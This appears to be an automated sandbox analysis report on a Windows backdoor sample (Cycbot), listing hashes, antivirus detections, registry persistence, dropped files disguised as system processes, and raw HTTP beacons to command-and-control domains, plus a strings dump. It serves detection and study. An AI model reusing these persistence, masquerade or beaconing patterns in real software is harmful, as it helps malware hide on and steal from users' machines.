Analysis Date2015-01-15 15:56:33
MD56750dc94eee2659186fa56628d191a8f
SHA16832c997546213f5297f9b0c38c8b3c0d5256afc

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: af03ef892bf97e435e5f5c52281d3507 sha1: 455c173191b2b08bdb2c0f33e362290bd787acfd size: 114176
Section.tls md5: f3c75bc75748124dca3f0864b9d6ae13 sha1: 469b8d73c95158272b21f83a26496e709ff58526 size: 1536
Section.data md5: 22e1a3acfc471cbd7baba2ad89eb8095 sha1: 335d976b66ee9f531df2672ef49a087dc8a52154 size: 65536
Section.reloc md5: d10eb799e58de98637b54c013a97a59d sha1: 1f09876c5ae27057358407a73889a7072910f1cd size: 1024
Timestamp2005-11-16 12:22:46
PEhashd0b580a3bd160ed99c810948ccbbb9fdee6460b8
IMPhash953d685d87b2835487bc114d85f5586f
AV360 Safeno_virus
AVAd-AwareGen:Heur.Conjar.9
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Heur.Conjar.9
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Heur.Conjar.9
AVCA (E-Trust Ino)Win32/FakeAlert.J!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-2916
AVDr. WebTrojan.DownLoader4.51028
AVEmsisoftGen:Heur.Conjar.9
AVEset (nod32)Win32/Kryptik.SMY
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureGen:Heur.Conjar.9
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan-Downloader.Win32.KillAV.d
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.s
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.9
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen5
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)BScope.Trojan.MTA.01556

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{F053D246-5CC9-46E9-9C51-723D87E9990B}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwwwmediaportal.com
Winsock DNS127.0.0.1
Winsock DNSonlinebizdirectory.com
Winsock DNScoolmediaportal.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSonlinebizdirectory.com
Type: A
184.168.66.121
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSwwwmediaportal.com
Type: A
128.199.187.239
DNSfile4exchange.com
Type: A
DNScoolmediaportal.com
Type: A
HTTP GEThttp://onlinebizdirectory.com/images/PowerHideBanner.gif?v71=79&tq=gHZutDyMv5rJeTfia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNx1Kv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: mozilla/2.0
HTTP GEThttp://wwwmediaportal.com/blog/images/3521.jpg?v10=21&tq=gKZEtzyMv5rJqxG1J42pzMffBvEp1ujbwvgS917X65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1032 ➝ 184.168.66.121:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 128.199.187.239:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 506f7765   GET /images/Powe
0x00000010 (00016)   72486964 6542616e 6e65722e 6769663f   rHideBanner.gif?
0x00000020 (00032)   7637313d 37392674 713d6748 5a757444   v71=79&tq=gHZutD
0x00000030 (00048)   794d7635 724a6554 66696139 6e726d73   yMv5rJeTfia9nrms
0x00000040 (00064)   6c366769 577a2532 424a5a62 56794125   l6giWz%2BJZbVyA%
0x00000050 (00080)   33442048 5454502f 312e300d 0a436f6e   3D HTTP/1.0..Con
0x00000060 (00096)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000070 (00112)   486f7374 3a206f6e 6c696e65 62697a64   Host: onlinebizd
0x00000080 (00128)   69726563 746f7279 2e636f6d 0d0a4163   irectory.com..Ac
0x00000090 (00144)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000000a0 (00160)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x000000b0 (00176)   2e300d0a 0d0a                         .0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000100 (00256)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000110 (00272)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000120 (00288)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7831 4b763937 35586c6d   X%2BSNx1Kv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a203c 703e4e6f 20737563 68206669   .. <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7631 303d3231   /3521.jpg?v10=21
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42764570   qxG1J42pzMffBvEp
0x00000040 (00064)   31756a62 77766753 39313758 3635724a   1ujbwvgS917X65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   7777776d 65646961 706f7274 616c2e63   wwwmediaportal.c
0x00000090 (00144)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x000000a0 (00160)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x000000b0 (00176)   696c6c61 2f322e30 0d0a0d0a 65210a20   illa/2.0....e!. 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.


Strings
..
.NW
d
.
....
..
.
..
...
{^.
.

080904b0
1.0.0.1
1532
&All Exit        Shift+C
&exit
FileVersion
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
`````````````
^^^^^^
~~~~~~~~
~~~~------!!!!{{{{{{{
<<<<<<
======
||||||
|||||||||
______%:::
!!!!!!
??????
???????
/////////////
.."""""""""
''''''
""""""
""""{{{{{{{{{{{
""")))
((((((((((
[[[[--------
]]]]]]
@,@ {&
@@@,,,,,
@@@@@@@@@@@@
&&&&&&&
&&&&&&&&;;;;
&&&&&&&&&&&&&&&&
######
++++}}}}}
++++++++=====
		??????
  `@-0
000000
05\ze6\w
0e'e&`
0re8pv
+0!R#'[gs
0]RTL[
$@@163+
?1=$g(&
_1}Iih
22222(((((((
222222
222222ttttttttt
2D >D!GA
'*:}2l
#2	mVC
], @2o
31QWsEcR9
3333333333
?3{`=7
3GGGGG
3(*Mm\QL
3q}WWZ
 41M7^
::444444
44444444@@@@3333'''''''
44444444444444
49gV( `
|4a @`
4$@`]C
4K- ``
4				LLLLL
~4mPve
<@4<Mz
4[NZR8
4qc%b+
4XT%2J
#520DV
       555
555555&
!!!!!!5555555D
5555tttPPdddddddddddd---zz
	_/5g>X
5$l	O_
5rJW4K~K
!6aS0, 
+6zg%aP8
777777
7f[XRO.
7H)s{3
7V-PI41M
8888888888888888888
88aaTT<<<<<
88}}RR
88|++++y
8HHHddddQQ
	!8ooooooooooooo;;;;;
8	'Qn4)
 ``9517&
999999999
9o{IC2
9O !`J
9rrrrrrrr
9U'beC
a1111RRRRRRRRR
-a, `3
>>>aaaaaa
AAAAAA
>>>>>>>aa@@@@@@<ccccccccccc...@@@@@@
a)cno\
ADVAPI32.dll
^|%Ay/
@@azcZ^
B++[[[
{b%-0&@@
B<;|4U
[Ba~-ja3]~hK
BB==11)))
bbb!!!
BBBBBB}}}}}}}}}}
BBBBBBBB
BBBBBBBBB
BBBBhhhhh
>B{K:*{
bP=[9c
BZZZZZZMM
C4Cr1C#x
CCCC555
ccccc777777777777
cccccc\\\\\\\\
CCCCCC
CCCGGGGGGGGGGGGGGGGG
C!#>|h
,@@cON
CoTaskMemFree
CreateProcessA
CreateStdAccessibleObject
`c;v?P
d7xnGl
++D9ATd
@.data
D$bic6
DDDDDD
ddddddd
||||||||||||DDDDDDD
dddddddd
DDDDDDDD
ddddddy
ddddYY
dDl2br
D	hQC7
d'''iiii=====m%%%%%%&&&&&&&
DJdAYB
&@@dJw
'Dj}z}
dm#U/H
Dr-zr?
E05dgmd8
E`'1+B
E2,@`~%J
E~3HzMet	
;E3_qn
eaWpR+
::Ee4j
eeaaaaaaa||||
]]]EEE
&&&&eeeeee
eeeeeeeeee
EEEEEEEEEEE
eeeeeePP@
 e/EfL
EFF	rF
* @eH+	W<
ejoi3t
EnumResourceNamesW
^]eQC1
eTDy	w
^ev8mm
ExitProcess
` Ey0d@
   ||f
f2&``eT
f{2\Hkj
f[5%Gx
fCcp"D
---FF|
FFFFFF
ffffffff
FFFFFFFmmmm
]]]]]]]]]FFFFFFFxiiiiiii
FH<\,N^
"  :fj
\f@!jt
<+F[>Ks
flREKkD
F[_+`Q	$
FTy-Wb^b
FWq0wS
))))g:
!!!!!!G
(` G0$
g=3gGr2
GetACP
GetCPInfoExA
GetCurrentProcess
GetEnvironmentVariableA
GetLocaleInfoA
GetModuleHandleA
GetSystemTimeAsFileTime
GetThreadLocale
g#F(@q
gggggg
GGGGGGG
ggggggggggggggssssrrr
GGGGGGJJJJJ
GIIIInnnnb
gJ	}>@
!gumOVm
!GV!}Z/
.\Gx+ /
@h`CiU
h{.@  ` d
hFxe#t
H hD=f
))hhhh
??HHHH
%%hhhhhhhh
HHHHHHm44444
HHHPP5
hhhrrrrrr
..hhhx
#, `hN
H$-nGZ
!<H$o.
@hSsGglA
@@Ht @
HT>o~o
H]UEf7
hWR  @U&@
` H/=>_zG
@/I1OJ
{I{|A(Vhb
I\B?HKG
iEEEESS
ih.dll
iiii=={{{{{f
IIIIIIIIIIffr}}}U
IIIIIIIIIII
IIIIIIIIIIIIe
@IIII/PPPPPPP
Ik9@z:B
i!kuS}
InterlockedExchange
i/%P7F
Ipf/F?
IsDebuggerPresent
IYs1(#
`;$``J
-J#4+F$
j~~A9U"
:JB/[6
J~`	{C
 jf4kh
jjjDDD
,,jjjjj>
jjjjjAAAAAA
``JJJJJJ
JJJJJJ//////////
JJJJJJJ
JJJJJJJJ
JJJJJJJJJJJ
*JNwH(D
J&	PC5d
J>>/*pd
jrr++++++++++++
K9IO;z
[!/KAy
kd+&  
Kddddddddgg
KERNEL32.dll
^^^^^kk
kk55555555
KKK,,,
kkkkkk
kkkkkk777777
KKKKKKKKKKKK))))))))))))
knnbbbb
K$` q7
``kwEH
kW%W}$@
<kX1W-{
l%~0%dy
l4X96f9[
l7.@@h
@`Lc`*
l" `c4
#######################LL
LLLLLLL
lllllllllllllllR
lllllttttttt
LocalAlloc
LP10DH `
?L$@`qN7
LresultFromObject
Lr]l~D
lstrlenA
lstrlenW
#lu1n'
'Lz#c!
@ m0a( `
mFVz	W
  MkkI+
MM3333
mmmmmm
mmmmmmm
MMMMMMMMMM
;;;mmmmmmmmmmmmm
@`mO)R
MultiByteToWideChar
m}uz.`
n```````````````
 ]N>):
N0e9@|~
N1++++++
N^6}kCO
^n& @9R
+N=F_#N
\\\NN^^
nnFFFFF
nnn999999999<<
nnnnnn
nnnnnnnn
NNNNNNNNNN
nVf-W?
`@o ``
O-----------
O(  \<
OicjTQ?
OLEACC.dll
oo;b5H
oooojj88
OOOOOO[
OOOOOOOOO
					OOOOOOOOOO
op#JAe
o	* `sK
%{O[!u]
OVyWe9
^p&@ 	
P"@`$  0C
%PB#%8p
Pffffffff
p<~.ftf;c\
[P	%G}u
pHHHHHHHH
PL}!;{
p:LXnf
ProgIDFromCLSID
P+v!btA$@
pX<MF"@@
q0\mSS7&
<>q*e>
'$@`qf
qh]D+O
@`!qJ4
@q;m/E
QQQQQ~~ll...
QQQQQQQQQ
qqqqqqqqqqqqqqqqqqqqqq
+=R6|N
RaiseException
}<rAo}v
@@}RDN
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
`R~hhw
RpB~*H2[N	
````?RRa
RRKKKKKKKK
:RRRRRRRRR/////////////
-RxH{cS" @
======rXXOOOOOOOOOOO
*******s
SetUnhandledExceptionFilter
SHELL32.dll
SHGetMalloc
SHGetPathFromIDListA
SHGetSpecialFolderLocation
sjt#t@	
-s)O:	=6
s)o7e<P:
SSS00pppp
ssssss
sssssss
SSSSSSSS
{sT?#]
StringFromCLSID
StringFromIID
`"t[)3
 t9h:IU
!This program cannot be run in DOS mode.
.TJqRST
#T(le+W
	.'tn>ND8
t'o*`@csn
ToGn0.
TTTTPP
;;TTTTTT
TTTTTTTTTTTT
TtX*O	D
_tuC@<
tU$y'a
 `+U3vN
UnhandledExceptionFilter
;[U^]q=$`@?N
(uSgUn
))))uu
uuuFFFFF
UUUUUKKKK
uuuuuu!!!!
UUUUUUUUUUU!!!!!!
]u" `V
V48xXf
VirtualQueryEx
VnrS3V
|vOp2x
VQQQQQQ
 V?!{R
VVeeeeeeeeeeeeeeeesss??ccc
VVVVV000J
VVVVVVVV
VVVVVVVVVVVVVVVV
VVVV~wwww
VzFt{X
[w" `, 
W87:r)x
Wc!<KN
	WDf. 
wD&@@W
WGGOb*;
w{GY0@
WideCharToMultiByte
)W][J3+nu
,@@w_L*
/wLAm$m'
w:+`@Q
*``Wr#H]
wwJJJJJJSSxxxxxx6666666
WWWW))
wwwwwwwwww
wwwwwwwwwwwww-
Wz_;Hs
X0pa^;)
	X\>3Y
x566=]
xc%9A9
Xh>?@#
xkkkkkkkkLLLLL
Xl"`@)
@`XmSm&
?XS|  
X+T?|	-
XTEwh;+T;2
"XT)X?+
)xvj=xm
\x?wG\6
\\\\XXX
}}}XXX0Jnnnnn
-------xxxx
XXXXrQ
XXXXXXX
xxxxxxxx
%+X`yV~e
-yb1Vw
<#YC(w
yGL-B3
yK$l_G(
YQ_Dto_	+
Yr{.L3y
Y]s-@[
y#Tse+
yyyyyy
 %yZx1C
z-------
 @'Z$ 
Z'CCj:k(`
ZGd2*@
ZjnTdr1
`ZlzqUx
;ZmYbxmY_(`
z|n.`@
[Z:N-%
{<=$zs\
` ~Zy;
ZZZZZZ
ZZZZZZ88